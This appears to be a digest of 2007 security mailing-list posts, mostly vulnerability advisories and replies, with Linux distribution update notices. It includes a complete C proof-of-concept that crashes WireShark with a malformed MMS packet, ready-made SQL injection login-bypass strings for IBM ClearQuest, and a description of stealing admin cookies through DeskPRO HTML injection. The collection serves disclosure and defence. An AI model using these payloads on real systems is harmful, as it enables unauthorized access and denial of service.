[HSC] DeskPRO Admin Panel Multiple HTML Injections An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. The intresting vulnranbility in ticket_escalate.php is that from User side, HTML Injection are shown in Admin CP admin/ticket_escalate.php Such attacks can be crafted were Attacker may inject cod ewere it willsend the Admins Cookies to Remote Attacker when Admin goes to view ticket_escalate.php We also see that in /admincp/techs.php If the attacker Injects Code into the Submit Form, techs.php Is effected in the Admin Control Panel. Also when we Set Workflow in ticket_rules_web.php with HTML Injection we get a injection result. Than there is /admincp/user_help.php?do=new_entry This simply allows one to inject any code into the PHP file. Hackers Center Security Group (http://www.hackerscenter.com) Credit: Doz Class: Input Validation Error Priority: Medium Remote: N/A Local: Yes Vendor: Headstart Solutions Limited Web Site: http://www.deskpro.com/ DeskPRO v3.0.2 * Beta and prior Versions May be effected! * Exploit is not needed, Attackers can exploit these issues via a web client. Vulrnable Urls. /admincp/ticket_category.php /admincp/ticket_priority.php /admincp/ticket_workflow.php /admincp/ticket_escalate.php /admincp/fields_ticket.php /admincp/ticket_rules_web.php admincp/ticket_displayfields.php /admincp/ticket_rules_mail.php /admincp/fields_user.php /admincp/fields_faq.php /admincp/user_help.php Only becoming an Ethical Hacker, you can stop a Hacker. Learn Security with out having to pay thousands!- http://kit.hackerscenter.com - The most comprehensive security pack you will ever find on the net!
COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability
===[ ABSTRACT ]= An unprivileged local user may send arbitrary signal to a child process despite security restrictions. ===[ AFFECTED SOFTWARE ] Linux 2.6 Linux 2.4 For the exact kernel version please refer to an information provided by your vendor. ===[ DESCRIPTION ]== Typically unprivileged user can not send signal to processes running with different UID. Due to vulnerability found in the Linux kernel any local user may bypass security restrictions and send arbitrary signal to any child process executed by the user. When a parent process dies or exits its child processes may receive a signal. Each child process may choose and set its own parent process death signal using PR_SET_PDEATHSIG function of the prctl() system call. PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) exit()'ed or killed child receives the signal The parent process death signal is not reset over execve() system call and is inherited by spawned process: PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) execve(./a.out) exit()'ed or killed child receives the signal The signal gets delivered only if parent process has sufficient privileges to send signals to child processes. Typically any child process running with higher privilege than its parent will receive no signal. PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) execve(/bin/setuid-binary) exit()'ed or killed child receives NO signal this time However, above restriction may be bypassed if parent process execute setuid-root binary which dies afterwards. PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) execve(/bin/setuid-binary) execve(/bin/setuid-binary) exit()'ed or killed privileged process receives the signal ===[ DISCLOSURE TIMELINE ]== 27th July 2007 Vendor notification 14th August 2007Public disclosure ===[ AUTHOR ]=== Wojciech Purczynski [EMAIL PROTECTED] Wojciech Purczynski is a Security Researcher at Vulnerability Research Labs, COSEINC PTE Ltd. Wojciech Purczynski is also a member of iSEC Security Research. ===[ LEGAL DISCLAIMER ]= Copyright (c) 2006,2007 Wojciech Purczynski Copyright (c) 2007 COSEINC PTE Ltd. All Rights Reserved. PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY PROHIBITED. THE DOCUMENT IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND. THE CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES, LOSSES OR UNLAWFUL OFFENCES. USE AT YOUR OWN RISK.
Re: CVE-2007-3382: Handling of cookies containing a ' character
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mark, Mark Thomas wrote: CVE-2007-3382: Handling of cookies containing a ' character Versions Affected: 5.5.0 to 5.5.24 Since 5.5.24 isn't yet released, will an upcoming 5.5.24 release include a fix for this problem given: Mitigation: Upgrade to 6.0.14 ? Thanks, - -chris -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGwc+29CaO5/Lv0PARAug2AJ98oeF8HRLiXIqqzDEazknml6N/pwCgiNkO +SIMwuOKQWDG0lkT1okzO7I= =6jSG -END PGP SIGNATURE-
WireShark MMS Remote Denial of Service vulnerability
Title
=
WireShark MMS Remote Denial of Service vulnerability
Date
13 August 2007
Affected Software
=
WireShark 0.99.6
Maybe all version of Ethereal
Overview
MMS message parse flaw in WireShark implementation may allow a remote attacker
to crash it causing denial of service.
Vulnerability Description
=
MMS means Multimedia Messaging Service. When WireShark parsing a MMS message
which Content-Type is application/vnd.wap.multipart.mixed, and the header len
of a multipart content equels to 0x00, then it will be crash.
Solution
Update to 0.99.6
PoC
//main.cpp
#include winsock2.h
#include stdio.h
#pragma comment(lib, ws2_32)
char *http =
POST / HTTP/1.0\r\n
Content-Type: application/vnd.wap.mms-message\r\n;
char *hoststr = Host: %s:%d\r\n;
char *contentlenstr = Content-Length: %d\r\n\r\n;
unsigned char mms[] =
{
0x8c,0x80,//X-Mms-Message-Type: m-send-req(0x80)
0x98,0x7a,0x77,0x65,0x6c,0x6c,0x00,//X-Mms-Transaction-ID: zwell
0x8d,0x92,//X-Mms-MMS-Version: 1.2
0x97,0x31,0x33,0x35,0x31,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x00,//To:
1351000
0x84,0xa3,//Content-Type: application/vnd.wap.multipart.mixed
//
0x01,//multipart,count
0x0f,//HeadersLen
0x05,//DataLen
0x00,//headlen === If this is 0x00, then wireshark will be crash.
The real value is the follow three lines bytes which is 0x0e
///
0x83,0x85,//Utf-8
0x7a,0x77,0x65,0x6c,0x6c,0x2e,0x74,0x78,0x74,0x00,//Name: zwell.txt
0x81,0xea,//Charset: utf-8
///
0x7a,0x77,0x65,0x6c,0x6c,//zwell
};
SOCKET connect_to_host(char *h, int p)
{
SOCKET sock;
struct hostent *host;
struct sockaddr_in saddr;
if((host=gethostbyname(h))==NULL)
{
printf(resolv host %s error\n, h);
exit(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
printf(create socket error\n);
exit(-1);
}
memset((void *)saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)host-h_addr_list[0]);
saddr.sin_port=htons(p);
if(connect(sock, (struct sockaddr *)saddr, sizeof(saddr))0)
{
printf(connect to host %s on port %d error\n, h, p);
exit(-1);
}
return sock;
}
void socket_init()
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2,0), wsaData);
}
int main(int argc, char **argv)
{
SOCKET s;
char sendbuf[1024];
int len = 0;
printf(WireShark0.99.6 MMS protocol DOS PoC\nCoded By
ZwelL\nhttp://www.nosec.org\n;);
if(argc != 3)
{
printf(usage : %s host port\n, argv[0]);
exit(-1);
}
socket_init();
s = connect_to_host(argv[1], atoi(argv[2]));
strcpy(sendbuf[len], http);
len += strlen(http);
sprintf(sendbuf[len], hoststr, argv[1], atoi(argv[2]));
len = strlen(sendbuf);
sprintf(sendbuf[len], contentlenstr, sizeof(mms));
len = strlen(sendbuf);
memcpy(sendbuf[len], mms, sizeof(mms));
len += sizeof(mms);
send(s, sendbuf, len, 0);
printf(completed!\n);
return 0;
}
IBM Rational ClearQuest Web SQL Injection Login Bypass
+==+ + IBM Rational ClearQuest Web Login Bypass (SQL Injection) + +==+ DISCOVERED BY: == SecureState sasquatch - [EMAIL PROTECTED] rel1k - [EMAIL PROTECTED] HOMEPAGE: = www.securestate.com AFFECTED AREA: === The username field on the login page is where the application is susceptible to SQL injection... SAMPLE URL: === http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrameratl_userdb=DATABASENAMEHERE,test=clientServerAddress=http://SERVERNAMEHERE/cqweb/loginusername='INJECTIONGOESHEREpassword=PASSWORDHEREschema=SCHEMEAHEREuserDb=DATABASENAMEHERE Log in as admin: == ' OR login_name LIKE '%admin%'-- (other variations work as well) ' OR login_name LIKE 'admin%'-- ' OR LOWER(login_name) LIKE '%admin%'-- ' OR LOWER(login_name) LIKE 'admin%'-- etc...use your imagination... Confirmed against: == version 7.0.0.1Label BALTIC_PATCH.D0609.929 version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630 FULL SQL Statement is spit back in error message: = SELECT master_users.master_dbid, master_users.login_name, master_users.encrypted_password, master_users.email, master_users.fullname, master_users.phone, master_users.misc_info, master_users.is_active, master_users.is_superuser, master_users.is_appbuilder, master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask FROM master_users WHERE login_name = 'INJECTION GOES HERE
Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability
On Tue, 14 Aug 2007, Wojciech Purczynski wrote: ===[ ABSTRACT ]= An unprivileged local user may send arbitrary signal to a child process despite security restrictions. ===[ AFFECTED SOFTWARE ] Linux 2.6 Linux 2.4 For the exact kernel version please refer to an information provided by your vendor. ===[ DESCRIPTION ]== Typically unprivileged user can not send signal to processes running with different UID. Due to vulnerability found in the Linux kernel any local user may bypass security restrictions and send arbitrary signal to any child process executed by the user. When a parent process dies or exits its child processes may receive a signal. Each child process may choose and set its own parent process death signal using PR_SET_PDEATHSIG function of the prctl() system call. PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) exit()'ed or killed child receives the signal The parent process death signal is not reset over execve() system call and is inherited by spawned process: PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) execve(./a.out) exit()'ed or killed child receives the signal The signal gets delivered only if parent process has sufficient privileges to send signals to child processes. Typically any child process running with higher privilege than its parent will receive no signal. PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) execve(/bin/setuid-binary) exit()'ed or killed child receives NO signal this time However, above restriction may be bypassed if parent process execute setuid-root binary which dies afterwards. PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) execve(/bin/setuid-binary) execve(/bin/setuid-binary) exit()'ed or killed privileged process receives the signal I'm not sure this is a real security issue. If some process has the same effective UID as the given one, the former can always send any signal to the latter. Thus the behaviour you described is IMHO normal. If setuid program just trusts the environment in that it doesn't properly handle or block signals whose default action is terminating the process and doesn't perform it's actions in a fail-safe manner, it is certainly broken. Setuid program must always be careful in signal handling and data processing. From another hand, PDEATHSIG should be always reset on exec() like signal handlers are (I'm not sure though if that is directly specified by any standard). Please correct me if I'm wrong. -- Sincerely Your, Dan.
EEYE: VGX.DLL Compressed Content Heap Overflow Vulnerability
VGX.DLL Compressed Content Heap Overflow Vulnerability Release Date: August 14, 2007 Date Reported: October 24, 2006 Severity: High (Code Execution) Systems Affected: Internet Explorer 6 SP1 - Windows 2000 SP4 Internet Explorer 6 SP1 - Windows XP SP1 Internet Explorer 6 SP2 - Windows XP SP2 Internet Explorer 6 SP1 - Windows Server 2003 SP1 Internet Explorer 6 SP2 - Windows Server 2003 SP2 Overview: eEye Digital Security has discovered a heap overflow vulnerability in VGX.DLL's processing of compressed content referenced from VML. VGX.DLL is the Microsoft component responsible for rendering VML (Vector Markup Language) within Internet Explorer. If a user views a malicious web page or HTML e-mail containing VML that points to compressed content on an attacker-controlled web server, the attacker can cause a heap overflow within the viewing application, leading to the execution of arbitrary code. (Note that, in order to be exploited directly from HTML e-mail, the victim must attempt to view the malicious e-mail in the Internet Zone, or with otherwise equivalent security and privacy settings that allow internet content to be downloaded and displayed.) Technical Details: VGX.DLL contains an implementation of the CDownloadSink class that processes data downloaded from URLs embedded within VML. For instance, the following VML will download additional content which will be handled by VGX.DLL!CDownloadSink::OnDataAvailable: v:rect v:imagedata src=http://malice/compressed.emz; /v:rect An integer underflow vulnerability exists within VGX.DLL!CDownloadSink::OnDataAvailable that can eventually cause URLMON.DLL!CMimeFt::SmartRead to overflow a heap buffer, due to a misreported buffer size when handling compressed content. The second argument ([EBP+10h]; [EBP+8] is the 'this' pointer) passed into CDownloadSink::OnDataAvailable is the total length of all raw (compressed) data received so far, but the function will subtract the total length of uncompressed data in its buffer from the total length of raw data when calculating the read limit to be passed to URLMON.DLL!CReadOnlyStreamDirect::Read. Assuming that the data is larger uncompressed than compressed, an integer underflow can be made to occur, causing a very large value (roughly 4GB) to be supplied as the read limit. If the amount of data subsequently read exceeds the amount of unused space in the buffer, a heap overflow with arbitrary binary data will result. Exploitation requires that CDownloadSink::OnDataAvailable be invoked at least twice -- once to load the buffer with some non-zero length of uncompressed data, and a second time to cause the overflow -- so the compressed data must be received in distinct (e.g., time-separated) pieces. Since such divisions may occur legitimately, positively identifying attempts to exploit this vulnerability are difficult, and conversely, even legitimate web sites may cause a non-malicious heap overflow to occur. Internet Explorer 7 silently fixed the vulnerability roughly ten months ago, due to a change in URLMON.DLL's behavior when reading compressed content. Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Blink Endpoint Vulnerability Prevention preemptively protects from this vulnerability. Vendor Status: Microsoft has released a patch for this vulnerability. The patch is available at: http://www.microsoft.com/technet/security/bulletin/MS07-050.mspx Credit: Discovery: Ben Nagy and Derek Soeder Research: Derek Soeder Related Links: Retina - Network Security Scanner - Free Trial: http://www.eeye.com/html/products/retina/download/index.html Blink - Unified Client Security Personal - Free For Home Use: http://www.eeye.com/html/products/blink/personal/download/index.html Blink - Unified Client Security Professional - Free Trial: http://www.eeye.com/html/products/blink/download/index.html Greetings: Tony B. for contributing the site. Jennifer, Barnz, Reverse, Karl, Dave, Steve, Glenn, Eric, Ryan, Saeed, Daniel, and Yuji. Greg rocks! (where were you in 2003?) The Cygnet. Copyright (c) 1998-2007 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
EEYE: Windows Metafile AttemptWrite Heap Overflow
Windows Metafile AttemptWrite Heap Overflow Release Date: August 14, 2007 Date Reported: March 27, 2007 Severity: High (Code Execution) Systems Affected: Windows 2000 SP4 Windows XP SP2 Windows Server 2003 SP1 Overview: eEye Digital Security has discovered a heap overflow vulnerability in the way the Windows Graphical Device Interface (GDI) processes Windows metafiles. If an application attempts to display a malicious metafile in a particular way, a heap overflow will occur and result in the execution of arbitrary code, with the privileges of the user who ran the application. Technical Details: The GDI32 function AttemptWrite is susceptible to a heap overflow vulnerability caused by an integer overflow, as depicted in the disassembly below. The AttemptWrite function is called by multiple GDI32 API functions, most notably CreateMetaFileW. 77F4B519 mov esi, [ebp+0Ch] ; reported size of record in bytes ... ; (user-controlled) 77F4B548 mov eax, [ebx+0Ch] ; amount of buffer used in bytes ; (user-controlled) 77F4B548 lea ecx, [eax+esi] ; *** integer overflow *** 77F4B54E cmp ecx, [ebx+08h] ; buffer capacity 77F4B551 ja _no_memcpy ... 77F4B56D mov edi, [ebx] ; pointer to start of buffer 77F4B56F mov ecx, esi 77F4B574 add edi, eax; now EDI points to unused buffer space ... 77F4B5BA mov eax, ecx 77F4B5BC shr ecx, 2 77F4B5BF rep movsd; *** complete heap overwrite *** By constructing a metafile containing an extremely large record length, a complete heap overwrite may occur, due to the intrinsic memcpy attempting to copy roughly 4GB of arbitrary data into a heap block. Because of the size of the copy, an access violation is inevitable, but in programs (such as Microsoft Office applications) that attempt to handle the exception, successful exploitation has been demonstrated. Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Blink Endpoint Vulnerability Prevention preemptively protects from this vulnerability. Vendor Status: Microsoft has released a patch for this vulnerability. The patch is available at: http://www.microsoft.com/technet/security/bulletin/MS07-046.mspx Credit: Yuji Ukai Related Links: Retina - Network Security Scanner - Free Trial: http://www.eeye.com/html/products/retina/download/index.html Blink - Unified Client Security Personal - Free For Home Use: http://www.eeye.com/html/products/blink/personal/download/index.html Blink - Unified Client Security Professional - Free Trial: http://www.eeye.com/html/products/blink/download/index.html Greetings: fourteenforty.jp Copyright (c) 1998-2007 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
FLEA-2007-0044-1 tetex tetex-dvips tetex-fonts
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0044-1 Published: 2007-08-14 Rating: Major Updated Versions: tetex=/[EMAIL PROTECTED]:devel//1/2.0.2-28.7-1[desktop is: x86] tetex-dvips=/[EMAIL PROTECTED]:devel//1/2.0.2-28.7-1[desktop is: x86] tetex-fonts=/[EMAIL PROTECTED]:devel//1/2.0.2-28.7-1[desktop is: x86] group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.8-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387 https://issues.foresightlinux.org/browse/FL-471 https://issues.rpath.com/browse/RPL-1596 https://issues.rpath.com/browse/RPL-1604 Description: Previous versions of the tetex package are vulnerable to an int overflow in included xpdf code, which can be exploited via a specially-crafted PDF file to execute arbitrary code. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (GNU/Linux) iQIVAwUBRsIG09fwEn07iAtZAQKFRw/9HOvYe6J2uongwNtmIN7H0D+3g5Tmtc8j g75EVNYMU8F/uNT5/i1P5oJgWNf0Vr/3FgjsK36vngeXft7szRMQmhG0NEz2/QM5 KHxg32M7gREJnkfpGFZI4ny01VQqBgCTpMnBbed5fEhLmc+cDk+CeqEK3fiqmfsM bwO2XdY2DmnH77rtPUjb9thFWu381b9Yx1BtnSGggsmwM+Ft8uPaCHqR9hKf4eyW oT3iQNb1N//NbSoZ3rGUioDPZHDzCp48XNMlZG85CWMwz3hfFBezRiiJOpaKW2am QGYBg/e0Lds8hKPoP+OAI+HrB24QkjLYYOxQKDjOlHrnGTpIePbL60eguvOG6Oiz Z3HtMaXCy67x8sAQReXFSx/QnsW6fzRQ9TZOSw6tO/91uuDKW34eAlpXB/f1Bhex tO5DlAsV9Ghlc0WF0SOC6UJW620JVAq2JrWMY6lpueLf4qO4OYiLde2ErB9gHB24 FYyGM+TgC6twg+gN3fwzf2Xd4xkkX0mFjuNoFTVT+UMe4DQA1CYbZMXGAtX7j+Ni jLhym0LEpvP0EDzBvtPms+N1F2F5w1s6hiarrfrBV5JLVPFjMDZS+dKnd841Wtaa J7ZpYyJt5RAqJsCfEu4XuTo71Rm+oFsAyxjMSAV6vZ+BYRw31i7nBItuTOMi0Meh IzTcy+F5PfU= =L7pD -END PGP SIGNATURE-
Multiple vulnerabilities in Live for Speed 0.5X10
### Luigi Auriemma Application: Live for Speed http://www.lfs.net Versions: = 0.5X10 Platforms:Windows Bugs: A] nickname buffer-overflow B] partial track buffer-overflow C] NULL pointer access in internet/hidden S1/S2 servers D] memcpy() NULL pointer in internet/hidden S1/S2 servers Exploitation: remote, versus server A] demo/S1/S2 in-game B] demo/S1/S2 in-game C] S1/S2 (internet/hidden) D] S1/S2 (internet/hidden) Date: 14 Aug 2007 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === Live for Speed (LFS) is one of the most known and cool car racing simulators available since you can do a lot of things: races, autocross, drifting, drag races and a parking too. ### === 2) Bugs === --- A] nickname buffer-overflow --- A buffer-overflow vulnerability is located in the portion of code which handles the client's nickname from packets with ID 3. This packet must contain the following NULL terminated strings: 24 bytes for the nickname 8 bytes for the car's plate 16 bytes for other data 16 bytes for the helmet For exploiting the bug it's enough to set a nickname longer than its needed size overwriting the other fields after it in the packet. B] partial track buffer-overflow Another buffer-overflow is exploitable through the packets with ID 10 but this time doesn't seem possible to use it for executing remote code because the return address is overwritten by a fixed string of the server. In short when the user requests a track which is not available on the host, the server calls: sprintf(buff, %s is not enabled on this host, client_track); using a destination buffer enough big to avoid the controlling of the return address but not enough for avoiding a crash. --- C] NULL pointer access in internet/hidden S1/S2 servers --- The S1 and S2 servers which run in internet (so visible on the master server) or hidden mode are vulnerable to a crash attack caused by the access to a NULL pointer. The problem is exploitable through a packet containing a byte 0x00 at the data offset 23 of the pre-login packet with ID 3. demo and LAN servers are not vulnerable. - D] memcpy() NULL pointer in internet/hidden S1/S2 servers - The S1 and S2 servers which run in internet (so visible on the master server) or hidden mode are vulnerable to a crash attack caused by the calling of memcpy() with a NULL source (in reality it's NULL + 12). The problem seems caused by the absence of one or more needed strings in the pre-login packet with ID 5. demo and LAN servers are not vulnerable. Resuming: Both the bugs A and B are in-game so the attacker must have access to the server like knowing its password if it's protected or being not banned. Bugs C and D instead work versus any server except demo and LAN servers and are not in-game so any attacker can crash any server, password protected too. ### === 3) The Code === with the following tool the bugs A and B can be tested only versus the demo server: http://aluigi.org/fakep/lfsfp.zip ### == 4) Fix == The only thing that the developers have been able to tell me is that the bugs will be fixed in Patch Y (yes I have asked for a release date but they don't know it)... that's really stupid since a quick fix was the best choice moreover considering the auto-patching system of the game. ### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org
Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability
On Tue, 14 Aug 2007, Wojciech Purczynski wrote: I'm not sure this is a real security issue. If some process has the same effective UID as the given one, the former can always send any signal to the latter. Thus the behaviour you described is IMHO normal. It becomes a security issue whenever suid process drops user's UIDs. But if it drops privileges (changes EUID back to RUID), it can't again send any signal to setuid process. -- Sincerely Your, Dan.
FLEA-2007-0045-1 poppler
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0045-1 Published: 2007-08-14 Rating: Major Updated Versions: poppler=/[EMAIL PROTECTED]:1-devel//1/0.5.9-2-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.8-2 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387 https://issues.foresightlinux.org/browse/FL-471 https://issues.rpath.com/browse/RPL-1596 https://issues.rpath.com/browse/RPL-1604 Description: Previous versions of the poppler package are vulnerable to an int overflow in included xpdf code, which can be exploited via a specially-crafted PDF file to execute arbitrary code. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGwhD8Wu/kq4lN9jkRAvHNAJ9iYd8RqwK0Ye4cW1h2GN5BbpMzKwCfYtpE 2s2b1KnweHoHWxA+FgW0II4= =1+kr -END PGP SIGNATURE-
Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability
Small correction - I forgot to add setuid(0) ;) PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) execve(/bin/setuid-binary) setuid(0) exit()'ed or killed child receives NO signal this time PARENT CHILD fork() prctl(PR_SET_PDEATHSIG) execve(/bin/setuid-binary) setuid(0) execve(/bin/setuid-binary) exit()'ed or killed privileged process receives the signal
Crash in Zoidcom 0.6.7
### Luigi Auriemma Application: Zoidcom http://www.zoidcom.com Versions: = 0.6.7 (some older version could be not vulnerable) Platforms:Windows, Linux and Mac Bug: crash Exploitation: remote Date: 14 Aug 2007 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === Zoidcom is an interesting network library studied for the minimal usage of bandwidth. ### == 2) Bug == The library can be crashed remotely through a malformed connection packet which forces the code to perform a double-delete of the data used for tracing the connection. ### === 3) The Code === http://aluigi.org/poc/zoidboom2.zip ### == 4) Fix == the bug will be fixed in version 0.6.8 ### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org
rPSA-2007-0160-1 openoffice.org
rPath Security Advisory: 2007-0160-1 Published: 2007-08-14 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: openoffice.org=/[EMAIL PROTECTED]:devel//1/2.2-0.2-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0245 https://issues.rpath.com/browse/RPL-1570 Description: Previous versions of the openoffice.org package are vulnerable to an arbitrary code execution attack in which an attacker can use a maliciously crafted RTF document to cause a heap-based buffer overflow. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
[ MDKSA-2007:163 ] - Updated koffice packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:163 http://www.mandriva.com/security/ ___ Package : koffice Date: August 14, 2007 Affected: 2007.0, 2007.1 ___ Problem Description: Maurycy Prodeus found an integer overflow vulnerability in the way various PDF viewers processed PDF files. An attacker could create a malicious PDF file that could cause koffice to crash and possibly execute arbitrary code open a user opening the file. This update provides packages which are patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387 ___ Updated Packages: Mandriva Linux 2007.0: 0b913eb2132d4a550927ffdc0259f8e6 2007.0/i586/koffice-1.5.91-3.4mdv2007.0.i586.rpm 33b068ca9bb2d6b6cdd4596daa391b9a 2007.0/i586/koffice-karbon-1.5.91-3.4mdv2007.0.i586.rpm 46a13862635271e6c3a6f13c059201b7 2007.0/i586/koffice-kexi-1.5.91-3.4mdv2007.0.i586.rpm f6d04fa68ff9ea999df9420fc06f2e34 2007.0/i586/koffice-kformula-1.5.91-3.4mdv2007.0.i586.rpm eeb21b221f83332b0d46743e30e61f95 2007.0/i586/koffice-kivio-1.5.91-3.4mdv2007.0.i586.rpm 5429f59c86897e21daeb8285c97eda54 2007.0/i586/koffice-koshell-1.5.91-3.4mdv2007.0.i586.rpm 2cf9fddf6034ed595a106c8d202d5de4 2007.0/i586/koffice-kplato-1.5.91-3.4mdv2007.0.i586.rpm e64b16a3ff9402cf114d07819284fec2 2007.0/i586/koffice-kpresenter-1.5.91-3.4mdv2007.0.i586.rpm 0904aca8893c7024e29f36b51dc6eda6 2007.0/i586/koffice-krita-1.5.91-3.4mdv2007.0.i586.rpm 25072496ee296b2d07fb738a0b35dfe0 2007.0/i586/koffice-kspread-1.5.91-3.4mdv2007.0.i586.rpm 8e0d340112c9966b3c6f9ebf186de7b5 2007.0/i586/koffice-kugar-1.5.91-3.4mdv2007.0.i586.rpm cfebda2be2a38427c869c4697c05d731 2007.0/i586/koffice-kword-1.5.91-3.4mdv2007.0.i586.rpm 97de592601422a50fa2991f36f2c6129 2007.0/i586/koffice-progs-1.5.91-3.4mdv2007.0.i586.rpm 219a7c8e8300712eb6b724170c782178 2007.0/i586/libkoffice2-karbon-1.5.91-3.4mdv2007.0.i586.rpm 38e20d8fe50a2ddff1f8884753bae636 2007.0/i586/libkoffice2-karbon-devel-1.5.91-3.4mdv2007.0.i586.rpm 65684b7931997775755d6f0ab05ec9b2 2007.0/i586/libkoffice2-kexi-1.5.91-3.4mdv2007.0.i586.rpm 2d5df64a8c2e2bb7f87fbd3fabc8abd0 2007.0/i586/libkoffice2-kexi-devel-1.5.91-3.4mdv2007.0.i586.rpm 109ed727361c634563aea2da5c9f 2007.0/i586/libkoffice2-kformula-1.5.91-3.4mdv2007.0.i586.rpm 4addc1aba792567db820377933c52d5c 2007.0/i586/libkoffice2-kformula-devel-1.5.91-3.4mdv2007.0.i586.rpm 28f6f837a65060576a8cd3f34fdab450 2007.0/i586/libkoffice2-kivio-1.5.91-3.4mdv2007.0.i586.rpm f6c7ee5a0ac6c561ad896d144f518079 2007.0/i586/libkoffice2-kivio-devel-1.5.91-3.4mdv2007.0.i586.rpm d242c28b1fb76cc0b6aaff39c097c992 2007.0/i586/libkoffice2-koshell-1.5.91-3.4mdv2007.0.i586.rpm 6f0a2dfafc0fe6ea20b792c4d07c715b 2007.0/i586/libkoffice2-kplato-1.5.91-3.4mdv2007.0.i586.rpm 68de6a5338f3b12eed36c9e7ed9e674b 2007.0/i586/libkoffice2-kpresenter-1.5.91-3.4mdv2007.0.i586.rpm 786ed715665216f2bf0791009e4336d8 2007.0/i586/libkoffice2-kpresenter-devel-1.5.91-3.4mdv2007.0.i586.rpm 24bd6de8ca946408d3a9ca6d818c20fc 2007.0/i586/libkoffice2-krita-1.5.91-3.4mdv2007.0.i586.rpm 0f886e9495d228a80364b4a329fc21f5 2007.0/i586/libkoffice2-krita-devel-1.5.91-3.4mdv2007.0.i586.rpm e0fad36ced48b93346b9719d95e5772e 2007.0/i586/libkoffice2-kspread-1.5.91-3.4mdv2007.0.i586.rpm 81821d0ce7c9fbf9284a99eedac32ba4 2007.0/i586/libkoffice2-kspread-devel-1.5.91-3.4mdv2007.0.i586.rpm 73bf37973e8bac224335bdb4b8ffb6b0 2007.0/i586/libkoffice2-kugar-1.5.91-3.4mdv2007.0.i586.rpm c990ba6daf142774d79f08fa37b9e519 2007.0/i586/libkoffice2-kugar-devel-1.5.91-3.4mdv2007.0.i586.rpm 9fd4c1ddb79561fcc2a628761bc58b59 